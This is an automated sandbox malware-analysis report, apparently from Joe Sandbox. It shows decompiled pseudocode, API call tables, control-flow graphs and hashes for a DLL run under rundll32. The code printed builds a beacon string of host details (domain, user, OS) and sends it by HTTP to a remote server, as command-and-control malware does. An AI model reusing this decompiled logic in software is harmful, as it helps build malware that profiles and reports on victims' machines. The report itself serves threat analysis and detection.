				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t116;

				_t103 = __edx;
				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x49fa018; // 0x6a85f48
				asm("bswap eax");
				_t31 =  *0x49fa014; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x49fa010; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x49fa00c; // 0x81762942
				asm("bswap eax");
				_t34 =  *0x49fa348; // 0x57d5a8
				_t3 = _t34 + 0x49fb633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3d173, _t33, _t32, _t31, _t30,  *0x49fa02c,  *0x49fa004, _t29);
				_t37 = E049F3F1E();
				_t38 =  *0x49fa348; // 0x57d5a8
				_t4 = _t38 + 0x49fb673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x49fa348; // 0x57d5a8
					_t8 = _t92 + 0x49fb67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E049F1567(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x49fa348; // 0x57d5a8
					_t10 = _t87 + 0x49fb8d4; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x49fa2d8, 0, _t104);
				}
				_t105 = E049F3268();
				if(_t105 != 0) {
					_t82 =  *0x49fa348; // 0x57d5a8
					_t12 = _t82 + 0x49fb8dc; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x49fa2d8, 0, _t105);
				}
				_t106 =  *0x49fa3cc; // 0x4f795b0
				_a24 = E049F5D1C(0x49fa00a, _t106 + 4);
				_t46 =  *0x49fa370; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x49fa348; // 0x57d5a8
					_t15 = _t78 + 0x49fb8b6; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x49fa36c; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x49fa348; // 0x57d5a8
					_t17 = _t75 + 0x49fb88d; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t108 = RtlAllocateHeap( *0x49fa2d8, 0, 0x800);
					if(_t108 != 0) {
						E049F3950(GetTickCount());
						_t54 =  *0x49fa3cc; // 0x4f795b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x49fa3cc; // 0x4f795b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x49fa3cc; // 0x4f795b0
						_t61 = E049F3739(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x49f928c);
							_push(_t111);
							_t66 = E049F3970();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E049F5347(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E049F3F62();
								}
								HeapFree( *0x49fa2d8, 0, _v16);
							}
							HeapFree( *0x49fa2d8, 0, _t111);
						}
						RtlFreeHeap( *0x49fa2d8, 0, _t108); // executed
					}
					HeapFree( *0x49fa2d8, 0, _a16);
				}
				RtlFreeHeap( *0x49fa2d8, 0, _t113); // executed
				return _a4;
			}




















































                                            0x049f636d
                                            0x049f636d
                                            0x049f6371
                                            0x049f6377
                                            0x049f6381
                                            0x049f6383
                                            0x049f6383
                                            0x049f6390
                                            0x049f639b
                                            0x049f639e
                                            0x049f63a9
                                            0x049f63ac
                                            0x049f63b1
                                            0x049f63b4
                                            0x049f63b9
                                            0x049f63bc
                                            0x049f63c8
                                            0x049f63d5
                                            0x049f63d7
                                            0x049f63dd
                                            0x049f63e2
                                            0x049f63ed
                                            0x049f63ef
                                            0x049f63f2
                                            0x049f63f9
                                            0x049f63fb
                                            0x049f6404
                                            0x049f640f
                                            0x049f6411
                                            0x049f6414
                                            0x049f6414
                                            0x049f6416
                                            0x049f641b
                                            0x049f641f
                                            0x049f6421
                                            0x049f6426
                                            0x049f6432
                                            0x049f6434
                                            0x049f6440
                                            0x049f6442
                                            0x049f6442
                                            0x049f644d
                                            0x049f6451
                                            0x049f6453
                                            0x049f6458
                                            0x049f6464
                                            0x049f6466
                                            0x049f6472
                                            0x049f6474
                                            0x049f6474
                                            0x049f647a
                                            0x049f648d
                                            0x049f6491
                                            0x049f6498
                                            0x049f649b
                                            0x049f64a0
                                            0x049f64ab
                                            0x049f64ad
                                            0x049f64b0
                                            0x049f64b0
                                            0x049f64b2
                                            0x049f64b9
                                            0x049f64bc
                                            0x049f64c1
                                            0x049f64cb
                                            0x049f64cd
                                            0x049f64d5
                                            0x049f64ee
                                            0x049f64f2
                                            0x049f64fe
                                            0x049f6503
                                            0x049f650c
                                            0x049f651d
                                            0x049f6521
                                            0x049f652a
                                            0x049f6530
                                            0x049f6538
                                            0x049f653d
                                            0x049f654a
                                            0x049f6550
                                            0x049f655c
                                            0x049f6562
                                            0x049f6563
                                            0x049f6568
                                            0x049f656e
                                            0x049f6574
                                            0x049f657b
                                            0x049f6582
                                            0x049f6588
                                            0x049f658f
                                            0x049f6593
                                            0x049f659e
                                            0x049f65a3
                                            0x049f65a9
                                            0x049f65b2
                                            0x049f65b2
                                            0x049f65c3
                                            0x049f65c3
                                            0x049f65d2
                                            0x049f65d2
                                            0x049f65e1
                                            0x049f65e1
                                            0x049f65f3
                                            0x049f65f3
                                            0x049f6602
                                            0x049f6612

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 049F6383
                                            • wsprintfA.USER32 ref: 049F63D0
                                            • wsprintfA.USER32 ref: 049F63ED
                                            • wsprintfA.USER32 ref: 049F640F
                                            • wsprintfA.USER32 ref: 049F6432
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F6442
                                            • wsprintfA.USER32 ref: 049F6464
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F6474
                                            • wsprintfA.USER32 ref: 049F64AB
                                            • wsprintfA.USER32 ref: 049F64CB
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049F64E8
                                            • GetTickCount.KERNEL32 ref: 049F64F8
                                            • RtlEnterCriticalSection.NTDLL(04F79570), ref: 049F650C
                                            • RtlLeaveCriticalSection.NTDLL(04F79570), ref: 049F652A
                                              • Part of subcall function 049F3739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,75BCC740,?,?,049F653D,?,04F795B0), ref: 049F3764
                                              • Part of subcall function 049F3739: lstrlen.KERNEL32(?,?,?,049F653D,?,04F795B0), ref: 049F376C
                                              • Part of subcall function 049F3739: strcpy.NTDLL ref: 049F3783
                                              • Part of subcall function 049F3739: lstrcat.KERNEL32(00000000,?), ref: 049F378E
                                              • Part of subcall function 049F3739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F37AB
                                            • StrTrimA.SHLWAPI(00000000,049F928C,?,04F795B0), ref: 049F655C
                                              • Part of subcall function 049F3970: lstrlen.KERNEL32(04F79B90,00000000,00000000,75BCC740,049F6568,00000000), ref: 049F3980
                                              • Part of subcall function 049F3970: lstrlen.KERNEL32(?), ref: 049F3988
                                              • Part of subcall function 049F3970: lstrcpy.KERNEL32(00000000,04F79B90), ref: 049F399C
                                              • Part of subcall function 049F3970: lstrcat.KERNEL32(00000000,?), ref: 049F39A7
                                            • lstrcpy.KERNEL32(00000000,?), ref: 049F657B
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 049F6582
                                            • lstrcat.KERNEL32(00000000,?), ref: 049F658F
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 049F6593
                                              • Part of subcall function 049F5347: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76CC81D0), ref: 049F53F9
                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 049F65C3
                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049F65D2
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,04F795B0), ref: 049F65E1
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F65F3
                                            • RtlFreeHeap.NTDLL(00000000,?), ref: 049F6602
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                            • String ID:
                                            • API String ID: 1892477351-0
                                            • Opcode ID: 9789e01be6eda3c2db08622be0004bd28f4a40b75b1e190928210846effa017b
                                            • Instruction ID: 568921d54b8e3fda9e6e193014d18d3c415d7d818042d7599c735b0530788f05
                                            • Opcode Fuzzy Hash: 9789e01be6eda3c2db08622be0004bd28f4a40b75b1e190928210846effa017b
                                            • Instruction Fuzzy Hash: 69718FB1208201AFD7219BA4EC48F9A3BE8EB89714F180134FA09D7260DB7DFD45DB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058044CE Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 141 58044ce-58044df 142 58044e1-58044ed call 58074f5 call 5809a58 141->142 143 5804533-580453e 141->143 157 58044f3-5804500 SleepEx 142->157 144 5804540 call 581e863 143->144 145 5804545-5804557 call 581d9dc 143->145 144->145 152 5804568-580456f 145->152 153 5804559-5804566 ReleaseMutex CloseHandle 145->153 155 5804580-580458d SleepEx 152->155 156 5804571-580457e ResetEvent CloseHandle 152->156 153->152 155->155 158 580458f 155->158 156->155 157->157 159 5804502-5804509 157->159 160 5804594-58045a1 SleepEx 158->160 161 580450b-5804511 159->161 162 580451f-5804531 RtlDeleteCriticalSection * 2 159->162 163 58045a3-58045a8 160->163 164 58045aa-58045b1 160->164 161->162 165 5804513-580451a call 580c6b8 161->165 162->143 163->160 163->164 166 58045c2-58045c9 164->166 167 58045b3-58045bc HeapFree 164->167 165->162 169 58045d1-58045d7 166->169 170 58045cb-58045cc call 5811163 166->170 167->166 172 58045e8-58045ef 169->172 173 58045d9-58045e0 169->173 170->169 175 58045f1-58045f2 RtlRemoveVectoredExceptionHandler 172->175 176 58045f8-58045fe 172->176 173->172 174 58045e2-58045e4 173->174 174->172 175->176 177 5804600 call 58066bb 176->177 178 5804605 176->178 177->178 180 580460a-5804617 SleepEx 178->180 181 5804620-5804629 180->181 182 5804619-580461e 180->182 183 5804641-5804651 LocalFree 181->183 184 580462b-5804630 181->184 182->180 182->181 184->183 185 5804632 184->185 186 5804635-580463f FindCloseChangeNotification 185->186 186->183 186->186
                                            APIs
                                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05813ED5), ref: 058044F7
                                            • RtlDeleteCriticalSection.NTDLL(05829400), ref: 0580452A
                                            • RtlDeleteCriticalSection.NTDLL(05829420), ref: 05804531
                                            • ReleaseMutex.KERNEL32(000005A8,00000000,?,?,?,05813ED5), ref: 0580455A
                                            • CloseHandle.KERNEL32(?,?,05813ED5), ref: 05804566
                                            • ResetEvent.KERNEL32(00000000,00000000,?,?,?,05813ED5), ref: 05804572
                                            • CloseHandle.KERNEL32(?,?,05813ED5), ref: 0580457E
                                            • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,05813ED5), ref: 05804584
                                            • SleepEx.KERNEL32(00000064,00000001,?,?,05813ED5), ref: 05804598
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,05813ED5), ref: 058045BC
                                            • RtlRemoveVectoredExceptionHandler.NTDLL(056F05B8), ref: 058045F2
                                            • SleepEx.KERNEL32(00000064,00000001,?,?,05813ED5), ref: 0580460E
                                            • FindCloseChangeNotification.KERNEL32(05D7F2C0,?,?,05813ED5), ref: 05804637
                                            • LocalFree.KERNEL32(?,?,05813ED5), ref: 05804647
                                              • Part of subcall function 058074F5: GetVersion.KERNEL32(?,?,76CDF720,?,058044E6,00000000,?,?,?,05813ED5), ref: 05807519
                                              • Part of subcall function 058074F5: GetModuleHandleA.KERNEL32(?,05D797B5,?,76CDF720,?,058044E6,00000000,?,?,?,05813ED5), ref: 05807536
                                              • Part of subcall function 058074F5: GetProcAddress.KERNEL32(00000000), ref: 0580753D
                                              • Part of subcall function 05809A58: RtlEnterCriticalSection.NTDLL(05829420), ref: 05809A62
                                              • Part of subcall function 05809A58: RtlLeaveCriticalSection.NTDLL(05829420), ref: 05809A9E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSectionSleep$CloseHandle$DeleteFree$AddressChangeEnterEventExceptionFindHandlerHeapLeaveLocalModuleMutexNotificationProcReleaseRemoveResetVectoredVersion
                                            • String ID:
                                            • API String ID: 1047430009-0
                                            • Opcode ID: a5cc9366f724928b5e6514b4ed533f73cb0a9bad2d2b981cddf689a2319d989d
                                            • Instruction ID: 55cd2d489713b47cae398237238678a03a8f67391e0744a0f9c9f025cad257ac
                                            • Opcode Fuzzy Hash: a5cc9366f724928b5e6514b4ed533f73cb0a9bad2d2b981cddf689a2319d989d
                                            • Instruction Fuzzy Hash: AA413B31790211ABEF70BF67EC8AA557FA9BB40610B069015FE15D72E0DFB5EC80CA61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F7A71 Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            C-Code - Quality: 92%
                                            			E049F7A71(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				int _t53;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E049F4DF6(__eax + __eax + 1);
				if(_t56 != 0) {
					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
					if(_t53 == 0) {
						E049F4C73(_t56);
					} else {
						E049F4C73( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E049F7A06) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E049F3A6F( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x49fa348; // 0x57d5a8
						_t15 = _t59 + 0x49fb743; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}















                                            0x049f7a71
                                            0x049f7a71
                                            0x049f7a7c
                                            0x049f7a83
                                            0x049f7a8b
                                            0x049f7a95
                                            0x049f7a9b
                                            0x049f7aa6
                                            0x049f7aae
                                            0x049f7abe
                                            0x049f7ab0
                                            0x049f7ab3
                                            0x049f7ab8
                                            0x049f7ab8
                                            0x049f7aae
                                            0x049f7ace
                                            0x049f7ad4
                                            0x049f7ad9
                                            0x049f7bc2
                                            0x00000000
                                            0x049f7af4
                                            0x049f7af7
                                            0x049f7b0a
                                            0x049f7b10
                                            0x049f7b15
                                            0x049f7b3d
                                            0x049f7b50
                                            0x049f7b5a
                                            0x049f7b5d
                                            0x049f7b63
                                            0x049f7b68
                                            0x00000000
                                            0x00000000
                                            0x049f7b6c
                                            0x049f7b78
                                            0x049f7b89
                                            0x049f7b8b
                                            0x049f7b9c
                                            0x049f7b9c
                                            0x049f7bac
                                            0x00000000
                                            0x049f7bbe
                                            0x00000000
                                            0x049f7bbe
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f7b15

                                            APIs
                                            • lstrlen.KERNEL32(?,00000008,76C84D40), ref: 049F7A83
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 049F7AA6
                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 049F7ACE
                                            • InternetSetStatusCallback.WININET(00000000,049F7A06), ref: 049F7AE5
                                            • ResetEvent.KERNEL32(?), ref: 049F7AF7
                                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 049F7B0A
                                            • GetLastError.KERNEL32 ref: 049F7B17
                                            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 049F7B5D
                                            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 049F7B7B
                                            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 049F7B9C
                                            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 049F7BA8
                                            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 049F7BB8
                                            • GetLastError.KERNEL32 ref: 049F7BC2
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                            • String ID:
                                            • API String ID: 2290446683-0
                                            • Opcode ID: 8edd8795ee5044d6cd2946b9d12d04c9f82a9fc076744050c5ac3204d3de65ec
                                            • Instruction ID: 020ea4d43091cd6fc5b129d5f9b6acb3017061defc4960d8ce5f04c96537ef45
                                            • Opcode Fuzzy Hash: 8edd8795ee5044d6cd2946b9d12d04c9f82a9fc076744050c5ac3204d3de65ec
                                            • Instruction Fuzzy Hash: B7417B71600604BFDB319FA5DC48EAB7FBDEB86705F148979F606E2190E774AA04CB20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F7EB5 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 241 49f7eb5-49f7f1a 242 49f7f1c-49f7f36 RaiseException 241->242 243 49f7f3b-49f7f65 241->243 244 49f80eb-49f80ef 242->244 245 49f7f6a-49f7f76 243->245 246 49f7f67 243->246 247 49f7f89-49f7f8b 245->247 248 49f7f78-49f7f83 245->248 246->245 249 49f8033-49f803d 247->249 250 49f7f91-49f7f98 247->250 248->247 256 49f80ce-49f80d5 248->256 251 49f803f-49f8047 249->251 252 49f8049-49f804b 249->252 253 49f7f9a-49f7fa6 250->253 254 49f7fa8-49f7fb5 LoadLibraryA 250->254 251->252 257 49f804d-49f8050 252->257 258 49f80c9-49f80cc 252->258 253->254 259 49f7ff8-49f8004 InterlockedExchange 253->259 254->259 260 49f7fb7-49f7fc7 GetLastError 254->260 262 49f80e9 256->262 263 49f80d7-49f80e4 256->263 265 49f807e-49f808c GetProcAddress 257->265 266 49f8052-49f8055 257->266 258->256 269 49f802c-49f802d FreeLibrary 259->269 270 49f8006-49f800a 259->270 267 49f7fc9-49f7fd5 260->267 268 49f7fd7-49f7ff3 RaiseException 260->268 262->244 263->262 265->258 272 49f808e-49f809e GetLastError 265->272 266->265 271 49f8057-49f8062 266->271 267->259 267->268 268->244 269->249 270->249 273 49f800c-49f8018 LocalAlloc 270->273 271->265 274 49f8064-49f806a 271->274 276 49f80aa-49f80ac 272->276 277 49f80a0-49f80a8 272->277 273->249 278 49f801a-49f802a 273->278 274->265 280 49f806c-49f806f 274->280 276->258 279 49f80ae-49f80c6 RaiseException 276->279 277->276 278->249 279->258 280->265 281 49f8071-49f807c 280->281 281->258 281->265
                                            C-Code - Quality: 51%
                                            			E049F7EB5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x49f0000;
				_t115 = _t139[3] + 0x49f0000;
				_t131 = _t139[4] + 0x49f0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x49f0000;
				_v16 = _t139[5] + 0x49f0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x49f0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x49fa1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x49fa1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x49fa1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x49fa1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x49fa1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x49fa1b8; // 0x0
										 *_t102 = _t125;
										 *0x49fa1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x49fa1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                            0x049f7ec4
                                            0x049f7eda
                                            0x049f7ee0
                                            0x049f7ee2
                                            0x049f7ee7
                                            0x049f7eed
                                            0x049f7ef2
                                            0x049f7ef5
                                            0x049f7f03
                                            0x049f7f0a
                                            0x049f7f0d
                                            0x049f7f10
                                            0x049f7f11
                                            0x049f7f14
                                            0x049f7f17
                                            0x049f7f1a
                                            0x049f7f1f
                                            0x049f7f2e
                                            0x00000000
                                            0x049f7f34
                                            0x049f7f3e
                                            0x049f7f48
                                            0x049f7f4d
                                            0x049f7f4f
                                            0x049f7f59
                                            0x049f7f5c
                                            0x049f7f5f
                                            0x049f7f65
                                            0x049f7f67
                                            0x049f7f67
                                            0x049f7f6a
                                            0x049f7f6d
                                            0x049f7f72
                                            0x049f7f76
                                            0x049f7f89
                                            0x049f7f8b
                                            0x049f8033
                                            0x049f8033
                                            0x049f803a
                                            0x049f803d
                                            0x049f8047
                                            0x049f8047
                                            0x049f804b
                                            0x049f80c9
                                            0x049f80cc
                                            0x049f80ce
                                            0x049f80ce
                                            0x049f80d5
                                            0x049f80d7
                                            0x049f80e1
                                            0x049f80e4
                                            0x049f80e7
                                            0x049f80e7
                                            0x00000000
                                            0x049f804d
                                            0x049f8050
                                            0x049f807e
                                            0x049f8088
                                            0x049f808c
                                            0x049f8094
                                            0x049f8097
                                            0x049f809e
                                            0x049f80a8
                                            0x049f80a8
                                            0x049f80ac
                                            0x049f80b1
                                            0x049f80c0
                                            0x049f80c6
                                            0x049f80c6
                                            0x049f80ac
                                            0x00000000
                                            0x049f8057
                                            0x049f805a
                                            0x049f8062
                                            0x049f8077
                                            0x049f807c
                                            0x00000000
                                            0x00000000
                                            0x049f807c
                                            0x00000000
                                            0x049f8062
                                            0x049f8050
                                            0x049f804b
                                            0x049f7f91
                                            0x049f7f98
                                            0x049f7fa8
                                            0x049f7fab
                                            0x049f7fb1
                                            0x049f7fb5
                                            0x049f7ff8
                                            0x049f8004
                                            0x049f802d
                                            0x049f8006
                                            0x049f800a
                                            0x049f8010
                                            0x049f8018
                                            0x049f801a
                                            0x049f801d
                                            0x049f8023
                                            0x049f8025
                                            0x049f8025
                                            0x049f8018
                                            0x049f800a
                                            0x00000000
                                            0x049f8004
                                            0x049f7fbd
                                            0x049f7fc0
                                            0x049f7fc7
                                            0x049f7fd7
                                            0x049f7fda
                                            0x049f7fea
                                            0x00000000
                                            0x049f7ff0
                                            0x049f7fd1
                                            0x049f7fd5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f7fd5
                                            0x049f7fa2
                                            0x049f7fa6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f7fa6
                                            0x049f7f7f
                                            0x049f7f83
                                            0x00000000
                                            0x00000000
